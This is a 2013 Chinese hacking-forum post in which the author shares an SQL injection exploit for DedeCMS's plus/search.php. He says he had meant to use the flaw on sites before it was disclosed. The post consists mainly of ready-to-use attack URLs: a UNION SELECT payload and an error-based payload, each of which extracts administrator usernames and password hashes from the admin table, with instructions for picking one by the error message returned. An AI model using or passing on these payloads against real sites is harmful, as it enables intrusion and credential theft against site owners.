找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2056|回复: 0
打印 上一主题 下一主题

[通杀]dedecms plus/search.php 注入漏洞利用EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-21 08:45:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
转载不加作者名的没JJ
5 T& T! ]! s/ f! l9 i2 j: o( C' Y% y9 t1 V3 h4 n. d# ?5 `/ n2 L
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。: R/ }  J9 w: K" j8 M0 C

) l# R. V, v' q# }既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
7 X: G$ a# d+ G( M- y: c' N* [+ v+ c" c/ |) P% k- L4 `
我一般是这样测试的:
: N& w% q, `4 f& y& S9 n$ W& H0 {4 Z( G% F6 z) \
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a. Q! t# M  j  f; P* H

3 v* d' X& Y9 ^1 `3 R2 g转载不加作者名的没JJ
4 l3 ~% F4 M7 N6 d1 T/ ~
% X1 V4 }5 h$ Z, R+ f5 l作者:鬼哥
" @3 t9 ^" l7 }
7 [' e5 e( X9 F' y/ m3 c# L) j
8 C& m& x7 j  C  r% x9 g& L3 V# n; Z
看结果如果提示
) k) ^" N  u1 z3 e, L" r8 F/ j+ a2 m
# q6 f& `  n: r" t4 q2 USafe Alert: Request Error step 2 !
4 U! o2 i/ {, a0 S, H6 ?# y
  l, l: C- |* n3 @) {0 \( i8 m那么直接用下面的exp
9 [( A1 S! i- U* l) ]7 j+ D2 o
" f8 z5 M: k( {9 \, E. |8 sxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a  l3 J# o) @+ p9 }
2 h% O# K7 R  o5 ]' S

$ @0 Z1 O5 p" P/ H7 H  [& x& @+ j  ?) H! R看结果如果提示
& g- l4 a2 w9 ?: |- N9 F0 x; g! s( \0 e/ K
Safe Alert: Request Error step 1 !
7 @  J' R8 e: B: k1 s4 ~% O$ W: V8 q9 h5 `& n
那么直接用下面的exp! U4 ?6 q3 K. O  \
; B1 K$ x, z9 f+ |" I
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a5 V  G% T" y. T# z

/ c1 L6 V% X5 c8 H+ @5 [0 ^0 Z9 x. r( y& m2 _5 P- k% b" @
如果正常显示证明漏洞不存在了。) f! j2 x& |! \. ~/ |

7 Q! k: e% ^1 b6 w9 z8 |) i转载不加作者名的没JJ
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表